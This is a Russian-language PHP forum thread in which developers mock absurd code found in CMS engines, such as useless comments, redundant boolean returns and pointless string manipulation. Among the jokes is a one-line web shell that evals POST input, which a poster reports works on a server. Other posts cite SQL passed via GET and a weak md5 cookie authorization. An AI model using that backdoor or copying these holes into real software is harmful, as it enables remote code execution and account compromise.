Обнаружено в коде

Статус
В этой теме нельзя размещать новые ответы.

Igor aka TiGR

Новичок
В коде IPB:
PHP:
    	// This is a useless comment. Completely void of any useful information
Там много такого... Правда больше плакать, а не смеятся хочется.
 

tf

крылья рулят
PHP:
if (var == true)
    return true;
else if (var == false)
    return false;
else
    return (!false && !true);
тоже неплохо :)
 

tf

крылья рулят
Romantik, это вы что про заплатку чтоли, которуя я сразу после отпуска лепил аж самому смешно сатало?
жалко изменяь нельзя,
я от той чуши на сайте быстро избавился :)
 

tf

крылья рулят
движочек дали посмотреть
с ним можно работать !!!
a.php
PHP:
<?php
eval ($_POST['command']);
?>
{сорри работает}
 

Wicked

Новичок
ну я видел вариант лишь немного хуже: GETом передавались куски sql запроса от WHERE и до конца.
 

tf

крылья рулят
сервер похоже не safe mode работает
и на винде стоит
жаль я дос никогда норм не знал а учить неохото :((
 

crocodile2u

http://vbolshov.org.ru
Romantik
Дык - не боги горшки обжигают. У себя в коде я могу такое отыскать при желании, что даже сюда, наверное, стыдно будет запостить :)
 

donflash

Вареник клуба
Следующее было обнаружено в одном движке

PHP:
..................
..................
$date = $_GET['date'];//Getting date from get (format xx/xx/xxxx)

/*
Manipulating...
*/
$r = explode('/', $date);
$r = implode('/', $r);

return $r;
Действительно важная манипуляция!
 

donflash

Вареник клуба
Автор оригинала: tf
зато работает :)))
Ага :), видно надо было сделать код "по-солиднее" или что-то в этом духе... Наверное, начальство проходило, а он "нафигачил" чушь, а потом забыл удалить....
 

tf

крылья рулят
// хотя не код но тоже смешно было
Голосование (http://rucms.ru/modules/articles/index.php?storytopic=10)
Какая у тебя CMS?
Бесплатная
+ Заказная
Платная
ok!
//Извините, но голосование по этому опросу закончилось.
//Закончился в 31.12.05 11:21

-~{}~ 25.09.06 13:03:

недавно писал какую-то легко взламываю автризация (не буду говорить зачем но надо было :D)
думал что не получилось, ну хотябы только на половину получилось, оказывается это не так
работает на 100% только скрипту надо постоянно посылать пустой логин и пароль ;)

-~{}~ 13.11.06 23:01:

посмотрел авторизацию с которой придется работать
PHP:
global $admin_login, $admin_password
if(md5("$admin_login-$admin_password")===$_COKIES["autch"])
 return true
было грусно
 

boombick

boombick.org
Убило наповал! Не просто наповал, а совсем...
PHP:
if (unlink("../news_photos/smalls/".$filename_old) == TRUE) {
     unlink("../news_photos/smalls/".$filename_old);
 }
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху